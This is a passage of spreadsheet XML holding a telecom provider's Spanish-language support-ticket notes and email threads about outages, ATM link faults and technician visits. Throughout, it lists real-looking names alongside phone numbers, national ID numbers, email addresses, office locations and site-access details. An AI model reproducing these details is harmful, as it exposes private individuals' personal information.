SOLICITAMOS SU APOYO EN GESTIONAR LOS ACCESOS CORRESPONDIENTES PARA EL PERSONAL TÉCNICO ASIGNADO A LA VISITA EL DÍA DE MAÑANA JUEVES 07/07 A PARTIR DE LAS 8:00 HRS.
DUI¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿NOMBRE
00815933-2¿¿10805¿¿¿¿¿¿¿MANUEL GARCIA
04339969-2¿¿10701¿¿¿¿¿¿¿HECTOR IVAN</t>
  </si>
  <si>
    <t>F4630130</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MARROQUIN 44876766 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 1001200432 - 1001200642</t>
  </si>
  <si>
    <t>F4630132</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DOUGLAS  AL 7985-3210 - 7578-4980 NO RESPONDE EN NINGUN NUMERO ||
SE INTENTARA LUEGO**
ID 1001189385 - 1001189625
**</t>
  </si>
  <si>
    <t>F4630134</t>
  </si>
  <si>
    <t>**SE LLAMA A ENCARGADO DE TURNO AL 26824016 NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001190095
**</t>
  </si>
  <si>
    <t>F4630136</t>
  </si>
  <si>
    <t>SE PROCEDE AL CIERRE DEL CASO, CLIENTE SAMUEL HERNÁNDEZ 78589009 CONFIRMA QUE RECIBIÓ EL CORREO Y ESTARÁ ESCALANDO EL CASO CON SU PROVEEDOR DE LA PBX PARA EL SEGUIMIENTO. ID: 1001107646</t>
  </si>
  <si>
    <t>SE HABLA CON SAMUEL PÉREZ 78589009 QUIEN COMENTA QUE HACE UNA HORA TUVO PROBLEMAS PARA REALIZAR LLAMADAS SALIENTES, INDICA QUE FUE UN BREVE MOMENTO, COMENTA QUE EL PROBLEMA FUE TANTO A LLAMADAS EXTERNAS COMO A EXENSIONES INTERNAS, LUEGO EL SERVICIO RESTABLECIÓ Y EN ESTE MOMENTO YA ESTÁ NORMAL. SE LE INDICA AL CLIENTE QUE EL TIEMPO DE REGISTRO DE LA PBX ESTÁ BAJO Y SE RECOMIENDA CAMBIARLO A 3600, ADICIONAL A ELLO, DE PARTE DE CLARO NO SE VEN INCONVENIENTES, POSIBLEMENTE SEA UN INCONVENIENTE CON SU PBX, CLIENTE SOLICITA SE LE ENVÍE CORREO PARA ESCALARLO CON SU PROVEEDOR.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050378589009
NÚMERO: 0050378589009
INICIO: HOY, 11:05 A. M.
FIN: HOY, 11:10 A. M.
DURACIÓN: 5:11
ID DE LLAMADA: 1001094095</t>
  </si>
  <si>
    <t>F4630137</t>
  </si>
  <si>
    <t>F4630138</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRO ILLESCAS 22912000 EXT 9000 MENCIONA QUE EL TICKET FUE REPORTADO A SOLICITUD DE LA EJECUTIVA SUHEYDI PAPA -  58682600
SOLICITA SE DE SEGUIMIENTO CON ELLA
-ID 1001167890</t>
  </si>
  <si>
    <t>F4630141</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. PAUL MEJICANOS 34617350  SOLICITA QUE SE REGRESE LA LLAMADA EN 10 MINS PARA VALIDAR PRUEBAS DE PRIMER NIVEL O LA SOLICITUD DE VISITA TECNICA.
SE VALIDA QUE SE COMPLETA L2 DEL PE EN MSAN
--	--	B4-43-26-00-D7-55	DYNAMIC	0	19	0	--	--	3740</t>
  </si>
  <si>
    <t>F4630163</t>
  </si>
  <si>
    <t>SE ESTA A LA ESPERA QUE CONFIRMEN HORA DE VISITA
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 6 DE JULIO DE 2022 18:44
PARA: ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: INESTABLE || IP2071061SV || BANCO LAFISE BANCENTRO S.A- || LA LIBERTADCTRO.COM. EL FAROCARRET. DEL LITORALENTRADA AL PUERTO DE LA LIBERT
BUENA TARDE
ESTIMADO CLIENTE, DANDO SEGUIMIENTO AL INCIDENTE, QUEDAMOS ATENTOS A SUS COMENTARIOS CON RESPECTO AL HORARIO DE VISITA.
SALUDOS CORDIALES.
DE: ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
ENVIADO: MIÉRCOLES, 6 DE JULIO DE 2022 16:59
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: INESTABLE || IP2071061SV || BANCO LAFISE BANCENTRO S.A- || LA LIBERTADCTRO.COM. EL FAROCARRET. DEL LITORALENTRADA AL PUERTO DE LA LIBERT
BUENAS TARDES COMPAÑEROS DE ATM,
EL ATM(202) PUMA PUERTO LA LIBERTAD PRESENTA PROBLEMAS EN EL ENLACE DE RESPALDO, ¿ES POSIBLE AGENDAR VISITA PARA EL DÍA DE MAÑANA HORA A LA HORA QUE PROPONE CLARO, SIENDO A LAS 7:30 A. M.? EN CASO CONTRARIO PROPONER UNA HORA PARA COORDINAR.
PERSONAL A PRESENTARSE: HERRY HERNESTO GUILLEN 69992995 DUI- 04051242-9
A LA ESPERA DE SU CONFIRMACIÓN
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERNESTO RUBIO SE LE COMENTA QUE ES NECESARIO APERTURAR CAJERO COMENTA QUE SE PROGRAME LA VISITA PARA MAÑANA A LAS 8:00 AM, ESTARA RESPONDIENDO CORREO
1001203527
COLA:
NOMBRE: A: 50377979726
NÚMERO: 50377979726
DURACIÓN: 0:01:45
ESTADO: CONECTADA
DETALLES: 50377979726
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 6/07/2022 17:06:55</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA VISITA PARA LAS 8:00 AM
DE: ERNESTO RUBIO &lt;ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV&gt;
ENVIADO: MIÉRCOLES, 6 DE JULIO DE 2022 18:48
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CARLOS AGUILARG &lt;CARLOS.AGUILARG@DAVIVIENDA.COM.SV&gt;; JOSE RODRIGUEZ &lt;JOSE.RODRIGUEZ@DAVIVIENDA.COM.SV&gt;; LUIS CHAVEZL &lt;LUIS.CHAVEZL@DAVIVIENDA.COM.SV&gt;
ASUNTO: RE: INESTABLE || IP2071061SV || BANCO LAFISE BANCENTRO S.A- || LA LIBERTADCTRO.COM. EL FAROCARRET. DEL LITORALENTRADA AL PUERTO DE LA LIBERT
HOLA CARLOS,
SE HA LOGRADO COORDINAR LA VISITA PARA MAÑANA A LAS 8:00 A. M. PERSONAL DE SERSAPROSA ESTARÁ EN EL SITIO PARA DARLES ACCESO A SUS EQUIPOS PARA HACER LA MEDICIÓN DE FO QUE NECESITEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4630167</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE BYRON ALFARO AL 55050483 INIDCA QUE SI CUENTAN CON ENERGIA QUE YA REINICIARON EQUIPOS Y NO LEVANTO EL SERVICIO INDICA QUE LOS EQUIPOS ESTAN ALARMADOS SE SOLICITAN DATOS DE VISITA**
HORARIO DE ATENCION: 8:00 AM 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCCIO: CENTRO GERENCIAL LAS MARGARITAS - TORRE 1 NIVEL 16 ZONA 10
ATENDERA EN SITIO: BYRON ALFARO
-ID 1001100797
**</t>
  </si>
  <si>
    <t>F4630171</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONEL CHAN-39583903  ## SE LLAMAN 3 VECES##MANDA DIRECTO A BUZON ##SE INTENTARA NUEVAMENTE EN BREVE##VIVO</t>
  </si>
  <si>
    <t>SE TIENE A LCIENTE EN LINEA LEONEL CHAN 39583903
1001104187
COLA:
NOMBRE: A: 39583903
NÚMERO: 39583903
DURACIÓN: 0:05:21
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 39583903
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/07/2022 11:39:42</t>
  </si>
  <si>
    <t>F4630172</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO ALVARENGA 78594774  ENVIA DIRECTO A BUZON
-ID 1001215482</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAURICIO ALVARENGA AL 78594774  NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
-ID 1001191823
**</t>
  </si>
  <si>
    <t>F4630222</t>
  </si>
  <si>
    <t>-* OSCAR ARGUETA 40870830 (CLIENTE) CONFIRMA SERVICIO OK Y AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4630277</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDGAR CASTRO NÚMERO:  72681515 , QUIEN INDICA QUE NO SE REQUEREN PERMISOS DE INGRESO,  QUE TÉCNICO SOLO LLEGUEN  IDENTIFICADOS
1001131428
COLA:
NOMBRE: A: 0050372681515
NÚMERO: 0050372681515
DURACIÓN: 0:01:44
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050372681515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 6/07/2022 12:58:03</t>
  </si>
  <si>
    <t>F4630353</t>
  </si>
  <si>
    <t>SE HABLÓ CON CARLOS LAÍNEZ/PR 23748935 INDICA QUE HASTA EL MOMENTO TODO OK, SE RETIRAN A LAS 19:00 HORAS. SE LLAMÓ/HABLÓ CON JESSICA SIERRA/CENTRAL 37622113 INDICA QUE PR OPERA POR PRINCIPAL, INDICA QUE REALIZARÁ SUS PRUEBAS CON PERSONAL DE REDES; PIDE SE LE LLAME EN 35 MINUTOS.</t>
  </si>
  <si>
    <t>F4630393</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE SALMERON AL 26412251  INDICA QUE REVISARAN INTERNAMENTE AL PARECER ES UN EQUIPO INTERNO PERO SOLICITA QUE NOSE CIERRE EL TICKET Y QUE SE LE LLAME MAÑANA POR LA TARDE PARA CONFIRMAR **
-ID 1001193696
**</t>
  </si>
  <si>
    <t>F4630394</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GERANDO LY JIMENEZ 50685417052 SE LE SOLICITA UN CONTACTO PARA REALIZAR PRUEBAS EN SITIO, CLIENTE INDICA QUE LE ENVÍE UN CORREO PARA BRINDAR EL CONTACTO DE LA PERSONA QUE PUEDE APOYAR. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4630396</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIANA MORALES 22773800 MENCIONA QUE EL ROUTER HUAWEI SE CAYO Y SE QUEBRO Y DESDE ENTONCES TIENEN CAIDA TOTAL, CLIENTE SOLICITA VISITA TECNICA
-ID 1001163400
EMPRESA:LAW &amp; COMMERCE S.A.
DIRECCION:3 AVENIDA  12-38 ZONA 10 EDIFICIO PASEO PLAZA NIVEL 9 OFICINA  902
CONTACTO EN SITIO: DIANA MORALES - 22773800
HORARIO:VISITA PARA MÑANA JUEVES A LAS  7.00
GESTION DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4630410</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SINDY LOPEZ AL 23753200  NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001195808
**</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE SRTA. SINDY LOPEZ INFORMA QUE SI TIENE INTERNET EN SUS COMPUTADORAS PERO TIENE 3 POS EN DOS SI TIENE SISTEMA PERO EN UNO NO TIENE CONEXION, SE LE SOLICITA ESCALAR A SU ENCARGADO DE IT PARA QUE REVISEN SUS EQUIPOS INTERNOS.</t>
  </si>
  <si>
    <t>F4630480</t>
  </si>
  <si>
    <t>|| SE SOLICITA VISITA EN CONJUNTO PARA MAÑANA A LAS 10:00 HRS || PENDIENTE QUE CONFIRMEN
ASUNTO. VISITA TÉCNICA ATM4505 || 47503530T || UBICADO CASERIO PLACA I, CALLE PRINCIPAL ENTRE RIOS, PUERTO BARRIOS (SUPER 24)
ERITO FERNANDO TECU XITUMUL
BUENA NOCHE ESTIMADOS 5B.
EN SEGUIMIENTO AL SERVICIO ATM4505 || 47503530T || UBICADO CASERIO PLACA I, CALLE PRINCIPAL ENTRE RIOS, PUERTO BARRIOS (SUPER 24). LE COMENTO QUE POR MONITOREO PROACTIVO SE TIENE ALARMADO EL SERVICIO POR LO QUE SOLICITAMOS SE PUEDA COORDINAR UNA VISITA EN CONJUNTO PARA APERTURA DEL ATM EL DÍA DE MAÑANA JUEVES 07/07 A PARTIR DE LAS 10:00 HRS.
ADJUNTO LOS DATOS DEL PERSONAL ASIGNADO.</t>
  </si>
  <si>
    <t>F4630494</t>
  </si>
  <si>
    <t>**SE LLAMA A WILMAR CHILEL AL NUMERO 54748598 CONTESTA LA SEÑORITA MELANI INDICA QUE EL SEÑOR WILMAR ESTA OCUPADO QUE SE LE LLAME EN 30 MIN NUEVAMENTE**
-ID 1001197563
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILMAR CHILEL 54748598 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001208383</t>
  </si>
  <si>
    <t>**SE LLAMA A WILMAR CHILEL AL NUMERO 54748598 CONTESTA LA SEÑORITA MELANI INDICA QUE EL SEÑOR WILMAR NO SE ENCUENTRA  QUE SE LE LLAME EN 30 MIN O 1 HR NUEVAMENTE**
-ID 1001201882
**</t>
  </si>
  <si>
    <t>F4630503</t>
  </si>
  <si>
    <t>##CLIENTE CONFIRMA QUE REINICIARON EQUIPOS  - SE ASOCIA REINICIO CON LA INESTABILIDAD QUE SE PERCIBIO. ##CLIENTE INDICA QUE REALIZA PRUEBAS Y PIDE VALIDAR EN 20 MINUTOS ##SERVICIO UP##VVO</t>
  </si>
  <si>
    <t>####SE RECIBE LLAMADA DE CLIENTE  RODOLFO PINEDA-47313070 COMENTA QUE YA CONSULTO Y QUE TODO ESTA OK- ##SOLICITA EL CIERRE DEL TICKET:
NOTA##CLIENTE NOS COMENTA QUE POR LA ZONA HAY FUERTES LLUVIAS Y POSIBILEMENTE HIZO QUE EQUIPO QUEDARA EN ALGUN MOMENTO INHHBIDO##VALIDA CEIRRE##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE  RODOLFO PINEDA-47313070 ## SE TIENE EN LINEA## VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RODOLFO PINEDA-47313070  ## 3 VECES##UNICAMENTE APARECE MENSAJE: DAÑO EN LINEA## SE PEDIRA APOYO A CC PARA QUE NOS UBIQUE OTRO CONTACTO DE CL ##VIVO</t>
  </si>
  <si>
    <t>F4630532</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JOSUE QUIEN INDICA QUE YA NO ESTA EN LAS INSTALACIONES HASTA EL DIA DE MAÑANA A LAS 8:00AM
1001170281
COLA:
NOMBRE: A: 32118608
NÚMERO: 011 50232118608
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: +50232118608
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/07/2022 15:10:48</t>
  </si>
  <si>
    <t>F4630577</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LOENIA PALACIOS AL 86046696 ENVIA DIRECTO A BUZON DE VOZ || SE INTENTARA
 LUEGO**
ID 1001198822
**</t>
  </si>
  <si>
    <t>F4630601</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN, SE INTTENTTARA LUEGO
1001207597</t>
  </si>
  <si>
    <t>F4630603</t>
  </si>
  <si>
    <t>CLIENTE SR. LUIS LOPEZ 46932038  CONECTO SU PC DIRECTO AL CPE, SE VALIDA ENLACE OPERATIVO, CLIENTE VALIDA Y AUTORIZA CIERRE DEL INCIDENTE.</t>
  </si>
  <si>
    <t>F4630626</t>
  </si>
  <si>
    <t>SE HABLÓ CON PAUL MEJICANOS/CLIENTE 34617350 INDICA QUE REALIZARÁ SUS PRUEBAS INTERNAS Y QUE SE MANTENGA SERVICIO EN MONITOREO POR 24 HORAS, SE DEBE VALIDAR SERVICIO MAÑANA A LAS 16:00 HORAS.</t>
  </si>
  <si>
    <t>F4630671</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JUAN MANUEL BAUTISTA/CLIENTE, SE LE INDICA QUE GESTOR N1 ESTÁ REALIZANDO PRUEBAS VÍA REMOTA A NIVEL DE EQUIPOS DE UM, AVANCES EN 25/30 MINUTOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN MANUEL BAUTISTA 30639811  NO RESPONDE, SE INTENARA LUEGO
-ID 1001206831</t>
  </si>
  <si>
    <t>F4630708</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM HERRERA-54111122 ## SE TIENE EN LINEA##</t>
  </si>
  <si>
    <t>F4630755</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE OSCAR FLORES 32606339  PERO NO CONTESTA Y ENVÍA A BUZÓN, SE INTENTARA EN UNOS INSTANTES
1001206285
1001206394
1001206697</t>
  </si>
  <si>
    <t>F4630776</t>
  </si>
  <si>
    <t>SE CONTESTA CORREO.
ASUNTO:  REPORTE DE SATURACIÓN CON LEPAERA 1 - BO. EL CENTRO 192.168.234.0/24</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO A CLIENTE, A LA ESPARA DE LA VALIDACION.
ASUNTO: REPORTE DE SATURACIÓN CON LEPAERA 1 - BO. EL CENTRO 192.168.234.0/24</t>
  </si>
  <si>
    <t>F4630785</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DENIS GARCIA INDICA QUE YA NO SE ENCUENTRA EN LAS INSTALACIONES.
SOLICITA LLAMADA EL DIA DE MAÑANA A LAS 8:00AM
1001206872
COLA:
NOMBRE: A: 30295720
NÚMERO: 011 50230295720
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: +50230295720
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/07/2022 17:19:39</t>
  </si>
  <si>
    <t>F4630842</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ÁNGEL RODRÍGUEZ/CLIENTE; SE LE INDICA QUE SE ASIGNA TÉCNICO A VERIFICAR SERVICIO, SE COMPLICA DEBIDO AL MAL CLIMA EN SECTOR, AVANCES EN UNA HORA.</t>
  </si>
  <si>
    <t>F4630980</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DIEGO PEÑA 77480083 INFORMA QUE DESPUES DE UNA SOBRE CARGA ELECTRICA Y BAJON DE ENERGIA, SE APAGARON LOS EQUIPOS SE LE INFORMA QUE EL ROUTER DE CLARO ESTA FUNCIONANDO CORRECTAMENTE, SE LE SOLICITA REVISAR SUS EQUIPOS Y CONEXIONES INTERNAS, CONFIRMA DE ENTERADO REALIZARA LAS VALIDACIONES A NIVEL LAN,  ID: 1001221005. SE PROCEDE AL CIERRE DEL INCIDENTE.</t>
  </si>
  <si>
    <t>F4631037</t>
  </si>
  <si>
    <t>CLIENTE PIDIÓ MONITOREO POR 24 HORAS, GESTIÓN N1 HACE CASO OMISO A LO DICHO Y CIERRA TICKET; SE REAPERTURA NUEVO TICKET Y SE PIDE A GESTIÓN N1 VÍA TEAMS NO CERRAR TICKET. DE DEBE VALIDAR SERVICIO MAÑANA A LAS 16:00 HORAS.</t>
  </si>
  <si>
    <t>F4631039</t>
  </si>
  <si>
    <t>ESTIMADOS SOC FAVOR SU APOYO VALIDANDO CONFORME EL COMENTARIO ANTERIOR, GRACIAS.</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE SR. JUAN CARLOS ZEAS 8731-4091 INFORMA QUE ESTARA ESCALANDO A SU PROVEEDOR DEL FW FORTINET, SOLICITA REALIZAR PRUEBAS EN CONJUNTO MAÑANA JUEVES A LAS 9:00 AM.</t>
  </si>
  <si>
    <t>F4631047</t>
  </si>
  <si>
    <t>VALIDACION EN HORARIO LABORAL DE AGENCIA
SAN FELIPE RETALHULEU
CÓDIGO	265
DIRECCIÓN	2A. CALLE 2-41, BARRIO EL CENTRO
TELÉFONO	PBX 23083000 EXT. 026511, 026521 - 51820423, 51819915
LUNES A VIERNES	08:30 - 17:00
SÁBADO	09:00 - 13:00</t>
  </si>
  <si>
    <t>F4631086</t>
  </si>
  <si>
    <t xml:space="preserve"> SE REALIZAN PRUEBAS CON CLIENTE SR. JOSUE LAGOS 89268283 VALIDA EQUIPOS ENCENDIDOS, APLICA REINICO A LOS EQUIPOS DE UM PERO ENLACE NO LEVANTA. SE PROCEDE A SOLICITAR APOYO DE CAMPO.</t>
  </si>
  <si>
    <t>F4631110</t>
  </si>
  <si>
    <t>PERSONAL DE GESTIÓN N1 CIERRA DE NUEVO TICKET, CUANDO SE LES HA INDICADO QUE CLIENTE PIDE MONITOREO PARA MAÑANA A LAS 16:00 HORAS.
DEBIDO A LA REINCIDENCIA, SE ESCALA CON JUAN CARDONA/TEAM LEADER N1 Y SE LE EXPLICA EL ESCENARIO, SE APERTURA NUEVO TICKET.</t>
  </si>
  <si>
    <t>F4631220</t>
  </si>
  <si>
    <t>SE HABLÓ CON CARLOS MARROQUÍN/CLIENTE 44876766 INDICA QUE ENLACE AÚN SIGUE CAÍDO, SE APERTURA NUEVO TICKET PARA REVISIÓN.</t>
  </si>
  <si>
    <t>F4631303</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL Y SE SOLICITA  CONTACTO LOCAL -*-**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 7 DE JULIO DE 2022 03:07
PARA: JAISWAL, AKSHIT - CONTRACTOR {PEP} &lt;AKSHIT.JAISWAL.CONTRACTOR@PEPSICO.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: DL - IT PEPSICO NETWORK OPERATIONS &lt;ITGNSQMANAGEMENT@PEPSICO.COM&gt;; DL - GLOBAL IT NET OPS SERVICE &lt;DL-GLOBALIT-NETOPSSERVICE@PEPSICO.COM&gt;; DL - IT INTL - NETWORK CASA &lt;DL-ITINTL-NETWORKCASA@PEPSICO.COM&gt;; DL - IT HCL NETWORK TEAM &lt;ITHCLNETWORKTEAM@PEPSICO.COM&gt;; DL - IT INTL - NETWORK CASA &lt;DL-ITINTL-NETWORKCASA@PEPSICO.COM&gt;; DL - IT HCL WIRELESS TEAM &lt;DL-ITHCLWIRELESSTEAM@PEPSICO.COM&gt;; PEPSICO-HCL-CIM &lt;PEPSICO-HCL-CIM@HCL.COM&gt;; PEPSICO NETWORK OPERATIONS CENTER &lt;PEPSICO.NOC@HCL.COM&gt;; AGUILAR, VICTOR - CONTRACTOR {PEP} &lt;VICTOR.AGUILAR.CONTRACTOR@PEPSICO.COM&gt;; FORERO, FABIAN - CONTRACTOR {PEP} &lt;FABIAN.FORERO.CONTRACTOR@PEPSICO.COM&gt;; SALGADO, CRISTIAN - CONTRACTOR {PEP} &lt;CRISTIAN.SALGADO2@PEPSICO.COM&gt;; BOHORQUEZ, DIEGO {PEP} &lt;DIEGO.BOHORQUEZ@PEPSICO.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: LATAM || GUAT-030 || AVENIDA DE LAS PALMERAS, SAN SEBASTIAN, ZONA 6 RETALHULEU, 11001 || SITE ISOLATED || INC05559454
BUENOS DÍAS ESTIMADOS SEÑORES PEPSICO.
                ACTUALMENTE SE CUENTA CON EL TICKET SD1141920 PARA LA REVISIÓN DEL SERVICIO, ADJUNTO MAIL DE RESPUESTA CUANDO FUE INGRESADO.
ES NECESARIO REALIZAR PRUEBAS CON LOS EQUIPOS EN SITIO, PODRIANINDICARNOS CONTACTOS LOCALES Y EL HORARIO PARA CONTACTARLOS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: JAISWAL, AKSHIT - CONTRACTOR {PEP} [MAILTO:AKSHIT.JAISWAL.CONTRACTOR@PEPSICO.COM]
ENVIADO EL: MIÉRCOLES, 6 DE JULIO DE 2022 23:06
PARA: CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DL - IT INTL - NETWORK CASA &lt;DL-ITINTL-NETWORKCASA@PEPSICO.COM&gt;; DL - IT INTL - NETWORK CASA &lt;DL-ITINTL-NETWORKCASA@PEPSICO.COM&gt;; PEPSICO-HCL-CIM &lt;PEPSICO-HCL-CIM@HCL.COM&gt;
CC: DL - IT PEPSICO NETWORK OPERATIONS &lt;ITGNSQMANAGEMENT@PEPSICO.COM&gt;; DL - GLOBAL IT NET OPS SERVICE &lt;DL-GLOBALIT-NETOPSSERVICE@PEPSICO.COM&gt;; DL - IT HCL NETWORK TEAM &lt;ITHCLNETWORKTEAM@PEPSICO.COM&gt;; DL - IT HCL WIRELESS TEAM &lt;DL-ITHCLWIRELESSTEAM@PEPSICO.COM&gt;; PEPSICO NETWORK OPERATIONS CENTER &lt;PEPSICO.NOC@HCL.COM&gt;; AGUILAR, VICTOR - CONTRACTOR {PEP} &lt;VICTOR.AGUILAR.CONTRACTOR@PEPSICO.COM&gt;; FORERO, FABIAN - CONTRACTOR {PEP} &lt;FABIAN.FORERO.CONTRACTOR@PEPSICO.COM&gt;; SALGADO, CRISTIAN - CONTRACTOR {PEP} &lt;CRISTIAN.SALGADO2@PEPSICO.COM&gt;; BOHORQUEZ, DIEGO {PEP} &lt;DIEGO.BOHORQUEZ@PEPSICO.COM&gt;
ASUNTO: RE: LATAM || GUAT-030 || AVENIDA DE LAS PALMERAS, SAN SEBASTIAN, ZONA 6 RETALHULEU, 11001 || SITE ISOLATED || INC05559454
++UPDATING AUDIENCE
FROM: JAISWAL, AKSHIT - CONTRACTOR {PEP} &lt;AKSHIT.JAISWAL.CONTRACTOR@PEPSICO.COM&gt;
SENT: WEDNESDAY, JULY 6, 2022 11:02 PM
TO: CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DL - IT INTL - NETWORK CASA &lt;DL-ITINTL-NETWORKCASA@PEPSICO.COM&gt;; DL - IT INTL - NETWORK CASA &lt;DL-ITINTL-NETWORKCASA@PEPSICO.COM&gt;; PEPSICO-HCL-CIM &lt;PEPSICO-HCL-CIM@HCL.COM&gt;
CC: 'PEPSICO NETWORK OPERATIONS CENTER' &lt;IMCEAEX-_O=EXCHANGELABS_OU=EXCHANGE+20ADMINISTRATIVE+20GROUP+20+28FYDIBOHF23SPDLT+29_CN=RECIPIENTS_CN=1246A3E01E054F679F389D034E24E51C-PEPSICO+2ENOC@NAMPRD08.PROD.OUTLOOK.COM&gt;; DL - IT PEPSICO NETWORK OPERATIONS &lt;ITGNSQMANAGEMENT@PEPSICO.COM&gt;; DL - GLOBAL IT NET OPS SERVICE &lt;DL-GLOBALIT-NETOPSSERVICE@PEPSICO.COM&gt;; DL - IT HCL NETWORK TEAM &lt;ITHCLNETWORKTEAM@PEPSICO.COM&gt;; DL - IT HCL WIRELESS TEAM &lt;DL-ITHCLWIRELESSTEAM@PEPSICO.COM&gt;; AGUILAR, VICTOR - CONTRACTOR {PEP} &lt;VICTOR.AGUILAR.CONTRACTOR@PEPSICO.COM&gt;
SUBJECT: RE: LATAM || GUAT-030 || AVENIDA DE LAS PALMERAS, SAN SEBASTIAN, ZONA 6 RETALHULEU, 11001 || SITE ISOLATED || INC05559454
[CAUTION: THIS EMAIL IS FROM OUTSIDE THE ORGANIZATION. UNLESS YOU TRUST THE SENDER, DON¿T CLICK LINKS OR OPEN ATTACHMENTS AS IT MAY BE A PHISHING EMAIL, WHICH CAN STEAL YOUR INFORMATION AND COMPROMISE YOUR COMPUTER.]
++UPDATING AUDIENCE</t>
  </si>
  <si>
    <t>F4631519</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL SOLICITANDO CIERRE --**
DE: EDUARDO LUIS PINEDA ZELEDA
